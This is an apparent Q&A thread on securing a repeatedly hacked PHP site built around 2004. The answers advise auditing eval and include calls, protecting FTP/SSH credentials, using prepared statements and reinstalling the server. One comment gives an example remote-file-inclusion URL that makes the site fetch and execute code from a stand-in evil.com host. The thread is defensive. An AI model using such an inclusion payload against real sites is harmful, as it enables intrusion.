# how to secure my website

Tags: php, security

I know securing any website is a very tough and broad topic to be discussed upon but i want to relate this question to my specific website which i've been working on. It was coded in php by some other programmer around 2004 and i am responsible for it's management. My problem is it's being hacked time and again. I have noticed following things when it's been hacked.

1. `.htaccess` file has been modified
2. `index.php` and `config.php` files were modified
3. Admin password has been changed
4. Uploading files in server
5. changing file permission of files and folders

I have worked on the code, it has been properly escaped and i think there is no probability of sql injection. Since most of the problem is related to files and permission i have a doubt about the server security but due to the reason that it was coded around 2004 surely it will lack some security, so what other things do i need work upon in my code to prevent my site being hacked for above mentioned problems?

Thanks in advance.

Comment: Try a few solutions at this question: http://serverfault.com/questions/12847/penetration-testing . There are a number of testing tools that will tell you where issues are...

Comment: whats your hosting? Shared? VDS or dedicated? If its shared, then the first stop is your webhost.

Comment: In what way have they been modified? What has been added? You should ask the server administrator to perform a virus scan on the machine. It's also possible that you have been affected by some brute force attack that has entered the system and got itself root-access.

Comment: @SimonAndréForsberg replacing content of index.php and config.php with hacker's html content

Comment: @uttam and what is the hacker's html content? Maybe it can tell you something about the hacker? Also, have you checked some server logs for ips of intruders? Can you check what processes are running?

Comment: Another thing that was quite popular back in 2004 was to have `register_globals` set to on. Probably the biggest security hole in PHP's history. I do hope that it's set to OFF now and that the code uses $_GET, $_POST and so on where appropriate and not use $_REQUEST.

Comment: @SimonAndréForsberg I found this link in html content https://www.facebook.com/pages/Sbkiller-My/330197740328338

Answer (score 5, accepted):

Since files have been modified, this is unlikely due to SQL injection bugs.

Possibilities to get to the files:

- Guess/steal your FTP password
- Hack the server (you can't really do anything about that)
- Insufficient isolation on the server, meaning other customers can change your files (you can't really do anything about that either)
- Remote code execution bugs

Now since you say the website is from 2004, it could be that it uses `eval` for templating or `include` for things like `site.php?section=foo` and then include `foo.php` in the code somewhere which were both done frequently back in 2004. So I'd do a quick file search for eval and the regex `include(.*\$.*)` as well as `require(.*\$.*)`. Those are prime suspects depending on how they were used.

Comment: "You can't really do anything", change hosting, inform your provider about problems or fix your server configuration.

Comment: I'd like to add "or SSH password" to "Guess/steal your FTP password".

Comment: @mensi You were quite right because the file to include is passed in the url like you said and there are some `eval` function used but i can't find `regex` for including files. Anyway thanks for the answer i'll look after the code and hope i can fix it.

Comment: @uttam: Just make sure nothing is included based on data from the visitor. If you do `include($section.'.php')` somewhere, I can simply visit `yoursite.php?section=http://evil.com/hack` and php's remote inclusion feature will include `http://evil.com/hack.php` and execute the code there. With eval, also make sure no user-supplied values get in there.

Answer (score 3):

Someone probably has direct access to the server, rather than to (a) script(s) in particular. This doesn't sound like a security issue having its origin in the codebase.

You might wanna consider moving the entire site to another provider if this has happened time and time again. Start over somewhere else, with fresh passwords, access control, etc.

Answer (score 2):

[OWASP top 10](https://www.owasp.org/index.php/Top_10_2010-Main) is very good read. Some guesses of mine.

- outdated OS which has vulnerabilities.
- MySQL injection and maybe all password stored in plain-text which is very very bad. For authentication you should be using something like openID instead. Also when you have MySQL-injection you should pronto update code to use PDO(prepared statements) if possible.
- read/write permissions not set properly or APACHE/PHP running at elevated level?

My advice to you is:

- read up on information on OWASP. Then cleary look for flaws in your code. Every line could be source off problem. Maybe you should ditch old code, because very insecure?
- reinstall your OS, because you could have a rootkit even?

Comment: PDO or mysqli -- I prefer mysqli myself ;)

Answer (score 1):

- Never use just shared hosting, use at least managed servers / keep the system up to date
- Check your php.ini for security issues (that you can google)
- Check your Apache/Nginx/... configs for overrides
- Never communicate unencrypted with the server (use SFTP, SSH, ...)
- Never trust external values (also from Cookies), always escape/cast those
- Filter user input (remove line breaks, 0x00 characters, tags, ... where undesired)
- Check all possibly existing user accounts for the server/database/...
- Check if all services run as the correct user
- Check file (write/execute) permissions in your web folders
- Escape everything you show on the website, do not even trust your database data to be safe in any way
- If you use 3rd party software, look out for security advisories
- re-install the server, you might have been rooted
- Use prepared statements

That's it;) This will enhance your security a lot, but experienced attackers are tough.